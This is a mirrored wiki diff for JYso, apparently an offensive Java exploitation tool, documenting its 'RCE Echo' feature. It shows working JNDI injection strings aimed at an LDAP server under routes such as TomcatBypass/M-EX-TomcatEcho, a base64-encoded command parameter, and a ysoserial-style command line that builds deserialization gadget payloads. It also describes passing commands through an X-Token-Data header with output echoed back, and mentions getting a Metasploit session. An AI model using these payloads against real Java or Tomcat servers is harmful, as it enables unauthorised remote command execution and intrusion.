mirror of
https://github.com/qi4L/JYso.git
synced 2026-09-26 00:31:52 +08:00
Updated 4、JAVA RCE Echo (markdown)
+4
-2
@@ -28,6 +28,8 @@
|
||||
|
||||
使用时在 Header 中加入 `X-Token-Data` 也可以自行指定,其值为待执行的命令,命令执行结果将回显在 response 中。
|
||||
|
||||
通过参数`-ch cmd`来自定义
|
||||
|
||||
+ JNDI-Injection-Exploit 用法:
|
||||
+ 不需要参数时
|
||||
```
|
||||
@@ -36,12 +38,12 @@ ${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho}
|
||||
|
||||
+ 需要参数时
|
||||
```
|
||||
${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho/shell/LWNoIENvb2tpZXNz}
|
||||
${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho/shell/[base64_encoding:-ch cmd]}
|
||||
```
|
||||
|
||||
+ ysoserial
|
||||
```
|
||||
java -jar JYso-[version].jar -y -g [Gadget] -p "EX-TomcatEcho"
|
||||
java -jar JYso-[version].jar -y -g [Gadget] -p "EX-TomcatEcho" -ch "cmd"
|
||||
```
|
||||
|
||||
- 支持tomcatBypass路由直接上线msf:
|
||||
|
||||
Reference in New Issue
Block a user